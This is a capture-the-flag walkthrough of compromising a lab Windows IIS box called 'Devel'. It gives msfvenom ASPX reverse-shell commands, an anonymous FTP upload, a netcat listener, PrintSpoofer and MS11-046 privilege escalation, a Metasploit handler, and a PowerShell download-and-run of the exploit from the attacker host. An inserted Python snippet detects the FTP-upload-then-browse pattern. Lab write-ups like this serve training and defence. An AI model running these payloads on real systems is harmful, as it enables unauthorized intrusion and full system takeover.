Devel
One-line summary (without msf): FTP anonymous login --> put ASPX reverse shell --> execute it via IIS --> gain access --> whoami /priv --> SeImpersonatePrivilege --> PrintSpoofer exploit --> rooted
One-line summary (with msf): FTP anonymous login --> put ASPX meterpreter reverse shell --> execute it via IIS --> gain access (meterpreter) --> msf local exploit suggester --> try the available exploits --> rooted
I have a habit of running scans in phases and naming them in sequence, like scan1, scan2.
The first scan I ran was a full port scan, saved as a file named scan1:
nmap -p- -n -vvv -oN nmap/scan1 10.10.10.5
The second scan I ran was against the specific ports found, saved as a file named scan2:
sudo nmap -p80,21 -sCV -oN nmap/scan2 10.10.10.5
Port 80: IIS is running.
Port 21: FTP is running.
ftp $ip
Successfully logged in with anonymous login.
Upload a test file via FTP and access it through the browser to confirm that uploaded files are served by IIS.
A quick search on IIS versions: IIS 7.5 corresponds to Windows Server 2008 R2.
A little bit about ASP vs ASPX:
ASP is VBScript based.
ASPX is .NET based.
If the IIS were from 2003 or earlier I would have used an ASP-based payload, because it is old and only supports ASP VBScript, whereas IIS on 2008 is relatively recent and .NET based. So I'll go with ASPX:
msfvenom -p windows/shell_reverse_tcp LHOST=youriphere LPORT=4444 -f aspx -o rks.aspx
Log in to FTP and upload the payload using the put command:
put rks.aspx
Start a netcat listener on the port set in the payload, then execute the shell by browsing to the uploaded file to get a shell back:
nc -nvlp 4444
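From the defender's side, the FTP-upload-then-browse step above leaves a simple pairing to detect: a completed STOR of a script file followed by an HTTP request for the same path on the same host. This is an added example, not part of the original writeup; the log lines are constructed and the W3C-style field order is an assumption.

```python
# Added example (not from the original writeup): flag a server-side script
# uploaded over FTP that is then requested over HTTP on the same host.
from datetime import datetime, timedelta

SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")
WINDOW = timedelta(minutes=10)

# Constructed FTP log lines (assumed W3C-style field order):
# date time c-ip cs-username cs-method cs-uri-stem sc-status
FTP_LOG = """\
2017-03-17 10:01:02 10.10.14.7 - USER anonymous 331
2017-03-17 10:01:02 10.10.14.7 anonymous PASS *** 230
2017-03-17 10:01:10 10.10.14.7 anonymous STOR /rks.aspx 226
2017-03-17 10:01:15 10.10.14.7 anonymous STOR /readme.txt 226
"""

# Constructed IIS web log lines: date time c-ip cs-method cs-uri-stem sc-status
WEB_LOG = """\
2017-03-17 10:01:20 10.10.14.7 GET /welcome.png 200
2017-03-17 10:01:31 10.10.14.7 GET /rks.aspx 200
"""

def _ts(date, time):
    return datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")

def script_uploads(ftp_log):
    """(timestamp, client_ip, user, uri) for each completed STOR of a script file."""
    out = []
    for line in ftp_log.splitlines():
        d, t, ip, user, method, uri, status = line.split()
        # 2xx status = transfer completed; only script extensions matter here
        if method == "STOR" and status.startswith("2") and uri.lower().endswith(SCRIPT_EXTS):
            out.append((_ts(d, t), ip, user, uri))
    return out

def correlate(ftp_log, web_log, window=WINDOW):
    """Pair each script upload with any HTTP request for that path within `window`."""
    requests = []
    for line in web_log.splitlines():
        d, t, ip, _method, uri, _status = line.split()
        requests.append((_ts(d, t), ip, uri))
    alerts = []
    for up_ts, up_ip, user, uri in script_uploads(ftp_log):
        for r_ts, r_ip, r_uri in requests:
            if r_uri.lower() == uri.lower() and up_ts <= r_ts <= up_ts + window:
                alerts.append({"uri": uri, "ftp_user": user, "uploader": up_ip,
                               "requester": r_ip, "delay_s": int((r_ts - up_ts).total_seconds())})
    return alerts
```

Anonymous uploads of .aspx files into a web-served directory should be rare enough that each alert is worth a look, and the same pairing works on real IIS logs once the field indices are adjusted to the configured W3C fields.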
whoami /priv
You can see that SeImpersonatePrivilege is Enabled.
Read more about this privilege here:
I will use PrintSpoofer to exploit this and escalate my privileges to NT AUTHORITY\SYSTEM.
whoami returns iis apppool\web
systeminfo
Gives you Windows system information useful for privilege escalation and local enumeration.
Info to look for: hotfixes, architecture and OS version.
searchsploit -u   (updates the searchsploit database)
Google "windows 7 7600 32 bit arch" or "windows 7 x86 exploit".
Found MS11-046 for privilege escalation. I copied the EDB-ID and searched for it in searchsploit:
searchsploit -m 40564
If you don’t have mingw-w64 installed, install it.
apt-get install mingw-w64
To compile the exploit, use the command below:
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
On the attacker machine start an HTTP server (python -m SimpleHTTPServer 80) and download the exe onto the target using PowerShell.
Run the exploit: 40564.exe
Check the user: whoami returns nt authority\system
Rooted.
Metasploit path: generate a meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=youriphere LPORT=yourlisteningport -f aspx -o rks.aspx
I am being careful with the payload selection: a 64-bit payload is not going to work if the target is 32-bit, so 32-bit is the safest one to choose initially, as a 32-bit payload works on a 64-bit machine as well.
msfconsole
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set lport yourlisteningport
run
Execute the shell from the browser and get a session back.
sysinfo
Check that the architecture matches the payload you used; if not, change your payload to the target architecture and redo the steps above.
Ctrl+Z to background the session.
search suggest   (looks for the local exploit suggester)
use post/multi/recon/local_exploit_suggester
sessions -l
set session 1
It is going to check a bunch of potential exploits for this machine and give you a list.
Select one of them and load it:
use exploit/....
show options
set session 1
set lhost tun0
run
PowerShell one-liner used above to download the compiled exploit onto the target (youriphere is the attacker IP placeholder used throughout):
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://youriphere/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"